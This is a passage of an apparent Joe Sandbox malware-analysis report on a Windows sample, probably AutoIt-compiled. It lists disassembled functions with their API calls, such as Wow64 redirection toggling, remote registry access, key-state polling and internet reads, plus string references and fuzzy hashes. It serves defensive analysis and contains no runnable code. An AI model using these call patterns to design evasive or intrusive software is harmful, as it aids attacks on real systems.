FreeLibrary.KERNEL32(00000000), ref: 00AFD3E5

Strings

GetSystemWow64DirectoryW, xrefs: 00AFD3B9
X64, xrefs: 00AFD2A8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
Instruction ID: 43869acb66e2e55797f1b97375e92dffb65f5e853d1181b1a4536a306daf7a4f
Opcode Fuzzy Hash: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
Instruction Fuzzy Hash: 8BF02032406A289BE72217908C08ABD3A66AF11B01B648284F706FA115DB30CD40A7D2

Function 00AA4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00AA4EA8
kernel32.dll, xrefs: 00AA4E94

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
Instruction ID: 103af36b1c969c8a6f3faf26b1be44d2b13a9ad3847cf8fc8fbdba541fff14f3
Opcode Fuzzy Hash: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
Instruction Fuzzy Hash: 87E0CD36A059225BD23217657C18B9F7994AFC7F63B150115FC05F3150DFE4CD0156E0

Function 00AA4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00AA4E6E
kernel32.dll, xrefs: 00AA4E5B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
Instruction ID: a055cf9d0303eeb6cce3254395e3e240e30b937ad9d92770c5e2a14bf63626ad
Opcode Fuzzy Hash: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
Instruction Fuzzy Hash: 1CD0C236502A215746321B647C18EDF7E98AFCAF113150111F905F31A0CFA0CD0192D0

Function 00B2A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00B2A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B2A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B2A468
CloseHandle.KERNEL32(?), ref: 00B2A63D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
Instruction ID: 3e0af0f2be96942c91575899bc471b59fad0f4ed3a50b6a91ebcd505098ec123
Opcode Fuzzy Hash: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
Instruction Fuzzy Hash: FCA17F71604301AFE720DF24D986F2AB7E5AF84714F14885DF55A9B3D2DBB0EC418B92

Function 00ADBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B43700), ref: 00ADBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00B7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00ADBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00B71270,000000FF,?,0000003F,00000000,?), ref: 00ADBC36
_free.LIBCMT ref: 00ADBB7F

Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0

_free.LIBCMT ref: 00ADBD4B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 11f9192066450353ee29b6e14cf0f9000c273939d42ca14d8559594a82f90a69
Instruction ID: 1f8849aa37457a31fe8258cd1e4e9ca3e86b7384ecc06b6ddbb001ed0a71489b
Opcode Fuzzy Hash: 11f9192066450353ee29b6e14cf0f9000c273939d42ca14d8559594a82f90a69
Instruction Fuzzy Hash: 5951C571910209EFCB10EF699D819AEB7B8FF44350B12466BE456E73A1EF709E409B70

Function 00B0E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD

Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16

Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A

lstrcmpiW.KERNEL32(?,?), ref: 00B0E473
MoveFileW.KERNEL32(?,?), ref: 00B0E4AC
_wcslen.LIBCMT ref: 00B0E5EB
_wcslen.LIBCMT ref: 00B0E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B0E650

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
Instruction ID: c911bcdcf880cc132739f93d2cbecf481410db6a19d91f2217ca4ccdd16b31c1
Opcode Fuzzy Hash: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
Instruction Fuzzy Hash: 67518FB24083449BC724EBA4DC81ADFB7ECEF85340F00496EF59993191EF75E6888766

Function 00B2B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B2BB63
RegCloseKey.ADVAPI32(?,?), ref: 00B2BBA6
RegCloseKey.ADVAPI32(00000000), ref: 00B2BBB3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
Instruction ID: c7e114d2efdbe20e5973ad91a9e670bde9f0b22da481a263809e5190756ef8cc
Opcode Fuzzy Hash: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
Instruction Fuzzy Hash: 5E61B031208241AFD714DF14D494E2ABBE5FF85348F1489ACF49A8B2A2DF31ED45CB92

Function 00B08BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B08BCD
VariantClear.OLEAUT32 ref: 00B08C3E
VariantClear.OLEAUT32 ref: 00B08C9D
VariantClear.OLEAUT32(?), ref: 00B08D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B08D3B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
Instruction ID: 7499b61f8dd7426a7b85e42c30e2c88f3b2880d60fd0bae0ac65b2b95656dcd2
Opcode Fuzzy Hash: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
Instruction Fuzzy Hash: DB517DB5A00219EFCB10CF58C894AAABBF5FF89310B158669F945DB350E730EA11CF90

Function 00B18AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B18BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B18BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B18C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B18C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B18C5F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 70e56dbe46c5aba1f7039ff32c98f95f07d589609dc9f62a3a7ef6f3b7b533c6
Instruction ID: f9dfa906f05f1664f6bc1e1639c1c4c9a2ea795053712e376bf1e94492a661a8
Opcode Fuzzy Hash: 70e56dbe46c5aba1f7039ff32c98f95f07d589609dc9f62a3a7ef6f3b7b533c6
Instruction Fuzzy Hash: CA513035A00215DFCB05DF64C981AAEBBF5FF49314F088498E8496B3A2DB35ED51CB90

Function 00B28EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B28F40
GetProcAddress.KERNEL32(00000000,?), ref: 00B28FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B28FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00B29032
FreeLibrary.KERNEL32(00000000), ref: 00B29052

Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B11043,?,7529E610), ref: 00ABF6E6
Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00AFFA64,00000000,00000000,?,?,00B11043,?,7529E610,?,00AFFA64), ref: 00ABF70D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
Instruction ID: 9ccb41d1a1876f7889c25f5be5005a27cf19f81264294818b1b10c843ea078f0
Opcode Fuzzy Hash: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
Instruction Fuzzy Hash: 24515C35A01215DFC711DF58D5948AEBBF1FF49314F0884A9E80AAB362DB31ED86CB90

Function 00B36B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B36C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00B36C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B36C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B1AB79,00000000,00000000), ref: 00B36C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B36CC7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
Instruction ID: 5f47505625142504154640b57b74b5815ffeb507a9cf18e4519efc24fcfc9a07
Opcode Fuzzy Hash: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
Instruction Fuzzy Hash: AB41E635A04104BFDB24CF68CC95FA9BFE4EB09350F6592A8F899A72E0D771ED41CA50

Function 00AD2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD20C3
_free.LIBCMT ref: 00AD20E3

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
Instruction ID: 49c7f63668ff0a9b79fc3c472bd6293254cec7b52614e969864587b2a4d4ff96
Opcode Fuzzy Hash: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
Instruction Fuzzy Hash: C841B632A00200AFCB24DF78C981B6DB7B5EF99714F154569E516EB391DA31ED01DB80

Function 00AB912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00AB9141
ScreenToClient.USER32(00000000,?), ref: 00AB915E
GetAsyncKeyState.USER32(00000001), ref: 00AB9183
GetAsyncKeyState.USER32(00000002), ref: 00AB919D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
Instruction ID: bf075eb6c8dfd10ba95b2dfc7142a85dbfadb349be22ab327db1b703fbf6b8dc
Opcode Fuzzy Hash: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
Instruction Fuzzy Hash: CF414D7190850AAADB159FA8D844BFEBB74FF05320F208319F529A72A1CB345954DB51

Function 00B13874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00B138CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B13922
TranslateMessage.USER32(?), ref: 00B1394B
DispatchMessageW.USER32(?), ref: 00B13955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
Instruction ID: a4e830e2d66bb921c0c3c9e743f437661dd5aa28255e1270a2b4c696b1523622
Opcode Fuzzy Hash: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
Instruction Fuzzy Hash: 7C31C6705043419EEB35CB789849BF63BE8EB15740F9405E9E467D30A0FBB4AAC5CB21

Function 00B1CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 00B1CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,00B1C21E,00000000), ref: 00B1CFF2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 5e54ff447f3fc1747e92ddc550df8ac8513611f04ea23f4c2a983abc68fcb638
Instruction ID: 3a0266afb8d6b4a475814b10db4024c238a539b77040dc654d43021df03cb63b
Opcode Fuzzy Hash: 5e54ff447f3fc1747e92ddc550df8ac8513611f04ea23f4c2a983abc68fcb638
Instruction Fuzzy Hash: 1B313A71540205AFDB20DFA5C984AABBFF9EB14354B6044AEF516E3141DB30EE8A9B60

Function 00B01901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B01915
PostMessageW.USER32(00000001,00000201,00000001), ref: 00B019C1
Sleep.KERNEL32(00000000,?,?,?), ref: 00B019C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 00B019DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B019E2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
Instruction ID: 1fe31bbc1d37416820057684b7057e08fa8c3857661e5e71080e06d76c3129c3
Opcode Fuzzy Hash: 847de4d0c25f22cd1b65ecb871533157b62ed02526744cecf1a8f9bf6b32201a
